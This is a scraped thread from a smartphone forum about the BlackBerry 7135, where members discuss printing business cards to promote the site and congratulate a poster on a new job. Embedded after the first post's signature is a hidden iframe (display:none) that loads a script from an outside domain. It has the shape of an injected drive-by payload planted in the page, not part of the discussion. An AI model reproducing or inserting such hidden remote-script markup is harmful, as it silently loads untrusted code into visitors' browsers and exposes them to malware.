+ Reply to Thread

Idea for Admin's

In the past few weeks their have been more and more people coming in to the retail store I work at with questions re the 7135. And I imagine it will only increase once Verizon releases the phone and we start getting the influx of user questions..........anyhow, I've found myself writing down "www.smartphonesource.com" more and more often. I wondered if some sort of printable business card like document could be created so that I could hand them out to those who show any interest in the 7135 or smartphones in general.

Not sure if their any legal boundaries that that may cross but just a though for some free advertising for you folk's who created this wonderful site.

JL<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    thats a great idea that im sure JJ and Jazz wont mind. 'course you have to hear it from their mouths, but word of mouth (no pun intended) is always a good thing. on behalf of them, i appreciate you spreading the word about this site!

Excellent idea jleroy!
    ~'kito
    pdaPhoneHome Moderator

Open Micorsfot Word. Choose "Tools" menu. Pick "Envelopes & Labels" option. Choose "Labels" tab. Hit "options" to choose "business card". hit "ok" then "New document"

Now you have a business card template. Just need to put some card stock in your printer and paste the appropiate image onto each card:

iPhone therefore iAm.

Thanks Steve! I'll give that a try.

JL

No problem. Not sure how the moderators feel about the use of their graphic, but I don't imagine they mind the free advertising!
    iPhone therefore iAm.

I've recently accepted an offer to take an opportunity at another company, so I will not be able to carry out my proposed advertisement......I do hope that any of you who do work for one of the current or potential carriers will do your best to spread the word about this great forum. As sales reps we have the most exposure to those who are intrigued and interested by the capabilities of some of the newest available technologies ...ie 7135..... and I think you should take it amongst yourselves to make www.smartphonesource.com an easily referencable tool. If you want to prevent your csr's from constantly returning to the store with ?'s then save yourself the time and refer them here.

I've been saucing most of the night and I'm rambling so I'll stop now!

JL

hmmmm
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

jleroy,

Congrats on your new career opportunity... I'd sauce to celebrate too!

Good advice for other carrier guys to share the love.
    Take care and good luck with the new job!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    jleroy,

Congrats on your new career opportunity... I'd sauce to celebrate too!

Good advice for other carrier guys to share the love.
    Take care and good luck with the new job!
    I've been at my new job for almost a month now...... and I'm still saucing, lol. :drink1 :drink3
    Please visit my picture site: Robert-O-Rama :)

Thanks a bunch Markito!